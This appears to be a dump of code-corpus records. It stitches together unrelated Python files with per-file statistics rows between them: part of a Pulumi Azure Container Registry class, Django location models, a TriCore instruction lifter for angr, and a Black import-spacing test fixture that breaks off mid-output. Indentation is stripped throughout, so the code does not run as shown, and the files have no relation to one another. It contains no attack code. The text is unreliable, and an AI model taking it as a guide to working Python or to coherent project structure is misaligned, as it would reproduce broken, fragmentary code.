:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Container Registry. Changing this forces a new resource to be created.
:param pulumi.Input[dict] network_rule_set: A `network_rule_set` block as documented below.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Container Registry. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU name of the the container registry. Possible values are `Classic` (which was previously `Basic`), `Basic`, `Standard` and `Premium`.
:param pulumi.Input[str] storage_account_id: The ID of a Storage Account which must be located in the same Azure Region as the Container Registry.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **network_rule_set** object supports the following:
* `defaultAction` (`pulumi.Input[str]`) - The behaviour for requests matching no rules. Either `Allow` or `Deny`. Defaults to `Allow`
* `ipRules` (`pulumi.Input[list]`) - One or more `ip_rule` blocks as defined below.
* `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
* `ipRange` (`pulumi.Input[str]`) - The CIDR block from which requests will match the rule.
* `virtualNetworks` (`pulumi.Input[list]`) - One or more `virtual_network` blocks as defined below.
* `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
* `subnetId` (`pulumi.Input[str]`) - The subnet id from which requests will match the rule.
The **storage_account** object supports the following:
* `accessKey` (`pulumi.Input[str]`)
* `name` (`pulumi.Input[str]`) - Specifies the name of the Container Registry. Changing this forces a new resource to be created.
> This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/container_registry.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['admin_enabled'] = admin_enabled
__props__['georeplication_locations'] = georeplication_locations
__props__['location'] = location
__props__['name'] = name
__props__['network_rule_set'] = network_rule_set
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['sku'] = sku
__props__['storage_account'] = storage_account
__props__['storage_account_id'] = storage_account_id
__props__['tags'] = tags
__props__['admin_password'] = None
__props__['admin_username'] = None
__props__['login_server'] = None
super(Registry, __self__).__init__(
'azure:containerservice/registry:Registry',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, admin_enabled=None, admin_password=None, admin_username=None, georeplication_locations=None, location=None, login_server=None, name=None, network_rule_set=None, resource_group_name=None, sku=None, storage_account=None, storage_account_id=None, tags=None):
"""
Get an existing Registry resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] admin_enabled: Specifies whether the admin user is enabled. Defaults to `false`.
:param pulumi.Input[str] admin_password: The Password associated with the Container Registry Admin account - if the admin account is enabled.
:param pulumi.Input[str] admin_username: The Username associated with the Container Registry Admin account - if the admin account is enabled.
:param pulumi.Input[list] georeplication_locations: A list of Azure locations where the container registry should be geo-replicated.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] login_server: The URL that can be used to log into the container registry.
:param pulumi.Input[str] name: Specifies the name of the Container Registry. Changing this forces a new resource to be created.
:param pulumi.Input[dict] network_rule_set: A `network_rule_set` block as documented below.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Container Registry. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU name of the the container registry. Possible values are `Classic` (which was previously `Basic`), `Basic`, `Standard` and `Premium`.
:param pulumi.Input[str] storage_account_id: The ID of a Storage Account which must be located in the same Azure Region as the Container Registry.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **network_rule_set** object supports the following:
* `defaultAction` (`pulumi.Input[str]`) - The behaviour for requests matching no rules. Either `Allow` or `Deny`. Defaults to `Allow`
* `ipRules` (`pulumi.Input[list]`) - One or more `ip_rule` blocks as defined below.
* `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
* `ipRange` (`pulumi.Input[str]`) - The CIDR block from which requests will match the rule.
* `virtualNetworks` (`pulumi.Input[list]`) - One or more `virtual_network` blocks as defined below.
* `action` (`pulumi.Input[str]`) - The behaviour for requests matching this rule. At this time the only supported value is `Allow`
* `subnetId` (`pulumi.Input[str]`) - The subnet id from which requests will match the rule.
The **storage_account** object supports the following:
* `accessKey` (`pulumi.Input[str]`)
* `name` (`pulumi.Input[str]`) - Specifies the name of the Container Registry. Changing this forces a new resource to be created.
> This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/container_registry.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["admin_enabled"] = admin_enabled
__props__["admin_password"] = admin_password
__props__["admin_username"] = admin_username
__props__["georeplication_locations"] = georeplication_locations
__props__["location"] = location
__props__["login_server"] = login_server
__props__["name"] = name
__props__["network_rule_set"] = network_rule_set
__props__["resource_group_name"] = resource_group_name
__props__["sku"] = sku
__props__["storage_account"] = storage_account
__props__["storage_account_id"] = storage_account_id
__props__["tags"] = tags
return Registry(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 60.046512
| 297
| 0.687064
| 1,670
| 12,910
| 5.115569
| 0.140719
| 0.050217
| 0.044247
| 0.028913
| 0.765539
| 0.744235
| 0.726677
| 0.726677
| 0.704905
| 0.683367
| 0
| 0.0001
| 0.227111
| 12,910
| 214
| 298
| 60.327103
| 0.856083
| 0.469171
| 0
| 0.025316
| 1
| 0
| 0.157473
| 0.025695
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050633
| false
| 0.063291
| 0.075949
| 0.025316
| 0.341772
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
cec546ace260893dca0e7a31221b2b33f8a6df37
| 1,428
|
py
|
Python
|
cask/world/models.py
|
dcramer/cask-server
|
32535229a907479c3645aa34b75755d3e2b12dda
|
[
"Apache-2.0"
] | 2
|
2018-08-07T16:18:54.000Z
|
2020-11-18T15:04:41.000Z
|
cask/world/models.py
|
dcramer/cask-server
|
32535229a907479c3645aa34b75755d3e2b12dda
|
[
"Apache-2.0"
] | 2
|
2020-02-11T23:07:31.000Z
|
2020-06-05T18:56:19.000Z
|
cask/world/models.py
|
dcramer/cask-server
|
32535229a907479c3645aa34b75755d3e2b12dda
|
[
"Apache-2.0"
] | null | null | null |
from uuid import uuid4
from django.db import models
class Country(models.Model):
id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
name = models.CharField(max_length=128, unique=True)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class City(models.Model):
id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
name = models.CharField(max_length=128, unique=True)
country = models.ForeignKey(Country, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class Region(models.Model):
id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
name = models.CharField(max_length=128)
country = models.ForeignKey(Country, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
class Meta:
unique_together = (("name", "country"),)
def __str__(self):
return self.name
class Location(models.Model):
id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
created_at = models.DateTimeField(auto_now_add=True)
name = models.CharField(max_length=128)
country = models.ForeignKey(Country, on_delete=models.CASCADE)
city = models.ForeignKey(City, on_delete=models.CASCADE)
def __str__(self):
return self.name
| 30.382979
| 74
| 0.72619
| 187
| 1,428
| 5.326203
| 0.229947
| 0.052209
| 0.052209
| 0.076305
| 0.84739
| 0.84739
| 0.823293
| 0.794177
| 0.752008
| 0.752008
| 0
| 0.014286
| 0.166667
| 1,428
| 46
| 75
| 31.043478
| 0.822689
| 0
| 0
| 0.71875
| 0
| 0
| 0.007703
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0625
| 0.125
| 0.96875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
ced4c6e575fd317df0a6b93c6c18a2c78ae18c1c
| 19,925
|
py
|
Python
|
angr_platforms/tricore/rrr_instr.py
|
shahinsba/angr-platforms
|
86f9ea90c396fb5561d0196a2d1a873e573b0294
|
[
"BSD-2-Clause"
] | null | null | null |
angr_platforms/tricore/rrr_instr.py
|
shahinsba/angr-platforms
|
86f9ea90c396fb5561d0196a2d1a873e573b0294
|
[
"BSD-2-Clause"
] | null | null | null |
angr_platforms/tricore/rrr_instr.py
|
shahinsba/angr-platforms
|
86f9ea90c396fb5561d0196a2d1a873e573b0294
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
""" rrr_instr.py
Implementation of RRR format instructions.
"""
from pyvex.lifting.util import Type, Instruction
from .rtl import * # pylint: disable=[wildcard-import, unused-wildcard-import]
from .logger import log_this
class RRR_CADD_Inst(Instruction):
""" Conditional Add instruction.
op = 0x2B
op2 = 0x00
User Status Flags: V, SV, AV, SAV
"""
name = 'RRR_CADD'
op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(0)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"a": int(data['a'], 2),
"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_dst_reg(self):
return "d{0}".format(self.data['c'])
def get_psw(self):
return self.get("psw", Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def get_d_a(self):
return self.get("d{0}".format(self.data['a']), Type.int_32)
def fetch_operands(self):
return self.get_d_a(), self.get_d_b(), self.get_d_d()
def compute_result(self, *args):
d_a = args[0]
d_b = args[1]
d_d = args[2]
condition = extend_to_32_bits(d_d != 0)
result = ((d_a + d_b) & condition) | (d_a & ~condition)
# set flags
psw = self.get_psw()
c = 0
v = (result >> 32 != 0)
sv = 0
av = result[31] ^ result[30]
sav = 0
psw = set_usb(psw, c, v, sv, av, sav)
self.put(psw, "psw")
return result
def commit_result(self, res):
self.put(res, self.get_dst_reg())
class RRR_CADDN_Inst(Instruction):
""" Conditional Add-Not instruction.
op = 0x2B
op2 = 0x01 (4-bits)
User Status Flags: V, SV, AV, SAV
"""
name = 'RRR_CADDN'
op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(1)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"a": int(data['a'], 2),
"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_dst_reg(self):
return "d{0}".format(self.data['c'])
def get_psw(self):
return self.get("psw", Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def get_d_a(self):
return self.get("d{0}".format(self.data['a']), Type.int_32)
def fetch_operands(self):
return self.get_d_a(), self.get_d_b(), self.get_d_d()
def compute_result(self, *args):
d_a = args[0]
d_b = args[1]
d_d = args[2]
condition = extend_to_32_bits(d_d == 0)
result = ((d_a + d_b) & condition) | (d_a & ~condition)
# set flags
psw = self.get_psw()
c = 0
v = (result >> 32 != 0)
sv = 0
av = result[31] ^ result[30]
sav = 0
psw = set_usb(psw, c, v, sv, av, sav)
self.put(psw, "psw")
return result
def commit_result(self, res):
self.put(res, self.get_dst_reg())
class RRR_CSUB_Inst(Instruction):
""" Conditional Subtract instruction.
op = 0x2B
op2 = 0x02
User Status Flags: V, SV, AV, SAV
"""
name = 'RRR_CSUB'
op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(2)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"a": int(data['a'], 2),
"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_dst_reg(self):
return "d{0}".format(self.data['c'])
def get_psw(self):
return self.get("psw", Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def get_d_a(self):
return self.get("d{0}".format(self.data['a']), Type.int_32)
def fetch_operands(self):
return self.get_d_a(), self.get_d_b(), self.get_d_d()
def compute_result(self, *args):
d_a = args[0]
d_b = args[1]
d_d = args[2]
condition = extend_to_32_bits(d_d != 0)
result = ((d_a - d_b) & condition) | (d_a & ~condition)
# set flags
psw = self.get_psw()
c = 0
v = (result >> 32 != 0)
sv = 0
av = result[31] ^ result[30]
sav = 0
psw = set_usb(psw, c, v, sv, av, sav)
self.put(psw, "psw")
return result
def commit_result(self, res):
self.put(res, self.get_dst_reg())
class RRR_CSUBN_Inst(Instruction):
""" Conditional Subtract-Not instruction.
op = 0x2B
op2 = 0x03
User Status Flags: V, SV, AV, SAV
"""
name = 'RRR_CSUBN'
op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(3)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"a": int(data['a'], 2),
"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_dst_reg(self):
return "d{0}".format(self.data['c'])
def get_psw(self):
return self.get("psw", Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def get_d_a(self):
return self.get("d{0}".format(self.data['a']), Type.int_32)
def fetch_operands(self):
return self.get_d_a(), self.get_d_b(), self.get_d_d()
def compute_result(self, *args):
d_a = args[0]
d_b = args[1]
d_d = args[2]
condition = extend_to_32_bits(d_d == 0)
result = ((d_a - d_b) & condition) | (d_a & ~condition)
# set flags
psw = self.get_psw()
c = 0
v = (result >> 32 != 0)
sv = 0
av = result[31] ^ result[30]
sav = 0
psw = set_usb(psw, c, v, sv, av, sav)
self.put(psw, "psw")
return result
def commit_result(self, res):
self.put(res, self.get_dst_reg())
class RRR_DVADJ_Inst(Instruction):
""" Divide-Adjust instruction:
op = 0x6B
op2 = 0x0D (4-bits)
User Status Flags: no change.
"""
name = 'RRR_DVADJ'
op = "{0}{1}".format(bin(6)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(0xd)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + '00' + 'i'*2 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_d_d_2(self):
return self.get("d{0}".format(self.data['d']+1), Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def fetch_operands(self):
return self.get_d_b(), self.get_d_d(), self.get_d_d_2()
def compute_result(self, *args):
d_b = args[0]
d_d = args[1]
d_d_2 = args[2]
result = ((d_d_2 == d_b) and (d_d_2[31])).ite(
(d_d[31]).ite(d_d.cast_to(Type.int_64),
(d_d+1).cast_to(Type.int_64)),
(d_d[31]).ite(((d_d_2).cast_to(Type.int_64)<<32)|(d_d+1).cast_to(Type.int_64),
((d_d_2).cast_to(Type.int_64)<<32) | d_d.cast_to(Type.int_64))
)
self.put(result & 0xffffffff, "d{0}".format(self.data['c']))
self.put(result >> 32, "d{0}".format(self.data['c']+1))
class RRR_DVSTEP_Inst(Instruction):
""" Divide-Step instruction:
op = 0x6B
op2 = 0x0F (4-bits)
User Status Flags: no change.
"""
name = 'RRR_DVSTEP'
op = "{0}{1}".format(bin(6)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(0xf)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + '00' + 'i'*2 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_d_d_2(self):
return self.get("d{0}".format(self.data['d']+1), Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def fetch_operands(self):
return self.get_d_b(), self.get_d_d(), self.get_d_d_2()
def compute_result(self, *args):
d_b = args[0]
d_d = args[1]
d_d_2 = args[2]
dividend_sign = d_d_2[31] # E[d][63]
divisor_sign = d_b[31]
quotient_sign = dividend_sign != divisor_sign
addend = (quotient_sign).ite(d_b, 0-d_b)
dividend_quotient = d_d # E[d][31:0]
remainder = d_d_2 # E[d][63:32]
# iter 0
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 1
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 2
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 3
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 4
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 5
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 6
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# iter 7
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = remainder + addend
remainder = ((temp.signed < 0) == dividend_sign) .ite(temp, remainder)
dividend_quotient = dividend_quotient | ((temp.signed < 0) == dividend_sign).ite(quotient_sign^1, quotient_sign)
# put result into E[c]
self.put(dividend_quotient & 0xffffffff, "d{0}".format(self.data['c']))
self.put(remainder & 0xffffffff, "d{0}".format(self.data['c']+1))
class RRR_DVSTEP_U_Inst(Instruction):
""" Divide-Step Unsigned instruction:
op = 0x6B
op2 = 0x0E (4-bits)
User Status Flags: no change.
"""
name = 'RRR_DVSTEP.U'
op = "{0}{1}".format(bin(6)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(0xe)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + '00' + 'i'*2 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_d_d_2(self):
return self.get("d{0}".format(self.data['d']+1), Type.int_32)
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def fetch_operands(self):
return self.get_d_b(), self.get_d_d(), self.get_d_d_2()
def compute_result(self, *args):
d_b = args[0]
d_d = args[1]
d_d_2 = args[2]
divisor = d_b
dividend_quotient = d_d # E[d][31:0]
remainder = d_d_2 # E[d][63:32]
# iter 0
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 1
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 2
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 3
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 4
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 5
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 6
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# iter 7
remainder = (remainder << 1) | dividend_quotient[31]
dividend_quotient <<= 1
temp = (remainder & 0xffffffff) - divisor
remainder = (temp.signed < 0).ite(remainder, temp)
dividend_quotient = dividend_quotient | ((temp.signed < 0)^1)
# put result into E[c]
self.put(dividend_quotient & 0xffffffff, "d{0}".format(self.data['c']))
self.put(remainder & 0xffffffff, "d{0}".format(self.data['c']+1))
class RRR_SEL_Inst(Instruction):
""" Select instruction.
op = 0x2B
op2 = 0x04 (4-bits)
User Status Flags: no change.
"""
name = 'RRR_SEL'
op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(4)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"a": int(data['a'], 2),
"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_dst_reg(self):
return "d{0}".format(self.data['c'])
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def get_d_a(self):
return self.get("d{0}".format(self.data['a']), Type.int_32)
def fetch_operands(self):
return self.get_d_a(), self.get_d_b(), self.get_d_d()
def compute_result(self, *args):
d_a = args[0]
d_b = args[1]
d_d = args[2]
condition = d_d != 0
return self.ite(condition, d_a, d_b)
def put(self, val, reg):
offset = self._lookup_register(self.irsb_c.irsb.arch, reg)
self.irsb_c.put(val, offset)
def commit_result(self, res):
self.put(res, self.get_dst_reg())
class RRR_SELN_Inst(Instruction):
""" Select-Not instruction.
op = 0x2B
op2 = 0x05 (4-bits)
User Status Flags: no change.
"""
name = 'RRR_SELN'
op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
op2 = "{0}".format(bin(5)[2:].zfill(4))
bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4
def parse(self, bitstrm):
data = Instruction.parse(self, bitstrm)
data = {"a": int(data['a'], 2),
"b": int(data['b'], 2),
"c": int(data['c'], 2),
"d": int(data['d'], 2)}
log_this(self.name, data, hex(self.addr))
return data
def get_dst_reg(self):
return "d{0}".format(self.data['c'])
def get_d_d(self):
return self.get("d{0}".format(self.data['d']), Type.int_32)
def get_d_b(self):
return self.get("d{0}".format(self.data['b']), Type.int_32)
def get_d_a(self):
return self.get("d{0}".format(self.data['a']), Type.int_32)
def fetch_operands(self):
return self.get_d_a(), self.get_d_b(), self.get_d_d()
def compute_result(self, *args):
d_a = args[0]
d_b = args[1]
d_d = args[2]
condition = d_d == 0
return self.ite(condition, d_a, d_b)
def put(self, val, reg):
offset = self._lookup_register(self.irsb_c.irsb.arch, reg)
self.irsb_c.put(val, offset)
def commit_result(self, res):
self.put(res, self.get_dst_reg())
| 33.543771
| 120
| 0.54936
| 2,904
| 19,925
| 3.607438
| 0.048554
| 0.030928
| 0.041237
| 0.06491
| 0.921249
| 0.914185
| 0.913039
| 0.909889
| 0.909889
| 0.885166
| 0
| 0.045856
| 0.277641
| 19,925
| 593
| 121
| 33.600337
| 0.681998
| 0.059072
| 0
| 0.890777
| 0
| 0
| 0.027015
| 0
| 0
| 0
| 0.009023
| 0
| 0
| 1
| 0.174757
| false
| 0
| 0.007282
| 0.11165
| 0.43932
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
0c98650f8339c56728442cdca93345d268c045c7
| 2,468
|
py
|
Python
|
tests/import_spacing.py
|
peterbe/black
|
61a8d401c797240c0bc5313a9ff068bb269479a5
|
[
"MIT"
] | 3
|
2018-11-06T14:54:37.000Z
|
2021-06-20T19:38:24.000Z
|
tests/import_spacing.py
|
peterbe/black
|
61a8d401c797240c0bc5313a9ff068bb269479a5
|
[
"MIT"
] | null | null | null |
tests/import_spacing.py
|
peterbe/black
|
61a8d401c797240c0bc5313a9ff068bb269479a5
|
[
"MIT"
] | 1
|
2020-04-08T00:25:03.000Z
|
2020-04-08T00:25:03.000Z
|
"""The asyncio package, tracking PEP 3156."""
# flake8: noqa
from logging import (
ERROR,
)
import sys
# This relies on each of the submodules having an __all__ variable.
from .base_events import *
from .coroutines import *
from .events import * # comment here
from .futures import *
from .locks import * # comment here
from .protocols import *
from ..runners import * # comment here
from ..queues import *
from ..streams import *
from some_library import (
Just, Enough, Libraries, To, Fit, In, This, Nice, Split, Which, We, No, Longer, Use
)
from name_of_a_company.extremely_long_project_name.component.ttypes import CuteLittleServiceHandlerFactoryyy
from name_of_a_company.extremely_long_project_name.extremely_long_component_name.ttypes import *
from .a.b.c.subprocess import *
from . import (tasks)
from . import (A, B, C)
from . import SomeVeryLongNameAndAllOfItsAdditionalLetters1, \
SomeVeryLongNameAndAllOfItsAdditionalLetters2
__all__ = (
base_events.__all__
+ coroutines.__all__
+ events.__all__
+ futures.__all__
+ locks.__all__
+ protocols.__all__
+ runners.__all__
+ queues.__all__
+ streams.__all__
+ tasks.__all__
)
# output
"""The asyncio package, tracking PEP 3156."""
# flake8: noqa
from logging import ERROR
import sys
# This relies on each of the submodules having an __all__ variable.
from .base_events import *
from .coroutines import *
from .events import * # comment here
from .futures import *
from .locks import * # comment here
from .protocols import *
from ..runners import * # comment here
from ..queues import *
from ..streams import *
from some_library import (
Just,
Enough,
Libraries,
To,
Fit,
